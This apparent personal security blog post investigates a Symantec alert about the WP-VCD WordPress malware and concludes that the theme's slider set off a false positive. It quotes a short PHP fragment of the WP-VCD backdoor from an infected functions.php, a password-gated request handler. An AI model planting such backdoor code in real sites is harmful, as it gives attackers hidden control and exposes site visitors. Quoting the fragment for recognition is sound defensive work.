Symantec Endpoint Protection Found Web Attack: Malicious Theme or Plugin Download 2 detected - NETSEC

Latest

Learning, Sharing, Creating

Cybersecurity Memo

Thursday, April 9, 2020

Symantec Endpoint Protection Found Web Attack: Malicious Theme or Plugin Download 2 detected

Here is what I got when I visited my Wordpress website, www.51sec.org. It looks like very interesting and I am wondering what has been detected.


Based on warning message and SID and I am able to find following details from Symantec (Broadcom) website:


===========================================================================



Web Attack: Malicious Theme or Plugin Download 2

Severity:High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects malicious activities associated with WP-VCD infection.

Additional Information

WP-VCD is a malware infection associated with WordPress websites. It spreads itself via nulled plugins and themes distributed by a network of related sites. This infection leads to black hat SEO activity (intended to manipulate search
engine results on behalf of attackers) and insertion of malvertising code that creates potentially dangerous redirects and pop-up ads for users viewing a compromised site.

Affected

  • WordPress websites
===========================================================================

I  were keeping digging into this WP-VCD infection and thinking my site probably infected. Here is what I found for WP-VCD.

===========================================================================

The WP-VCD infection itself is spread via “nulled”, or pirated, plugins and themes distributed by a network of related sites, and it’s remarkable in the way it propagates once deployed. Behind the scenes, extensive command and control (C2) infrastructure and self-healing infections allow attackers to maintain a persistent foothold on these infected sites.
1
2
3
4
5
6
7
8
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
    {
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
The code snippet above was sourced from an infected functions.php file on a site compromised by WP-VCD. Due to the campaign’s prevalence, this example is likely immediately recognizable to anyone with experience handling WordPress malware infections.
===========================================================================
Before starting to compare the backup files with current files to find out where is this WP-VCD code injected, I am thinking about to try some other steps first.

By looking at Symantec Endpoint Protection, I could not see any details to help.



Interesting thing is this warning only shows on homepage , not other pages in this website. That is first thing I noticed. If it is the theme or plug in infected, should all pages got this warning?

1. Online vulnerability scan, security checking
I could not find any other online scanning tools to warn similar.

2. Upgrade themes and plugins
All themes and plugins have been upgrade to latest version.

3. Deactivate plugins
checking all related plug-in and deactivate them one by one to see if that helps, but found nothing.

4. Focusing on interesting things you found
Eventually I were thinking what is different from first homepage to other page. Only section shows on first page is Slider settings.

I decided to turn off Slider settings on all pages as shown in following screenshot, then that annoying warning message has gone.

5. Installed malcare plugin to scan whole site and found nothing from my site.
This is quite decent and useful software for site securty, it will grab some of database tables and all site files to its cloud server to do scanning. WP-VCD signature definitely is in its database. If there is anything related to WP-VCD, Malcare will find it out.

6. My last resort would be comparing files from backup.
That would take a bit long to figure out. Glad I am able to find out it is slider causing this. It might relate to slider code from Startup Blog Theme by Compete Themes.

To sum up, this is just false positive from Symantec Endpoint Protection software based on my troubleshooting in this morning. Symantec security has been bought out by Broadcom for a while. the future for Symantec product is not clear. I might need to think about to change to other security software.

Note. It has been reported to Symantec Review site - https://symsubmit.symantec.com/





References






No comments:

Post a Comment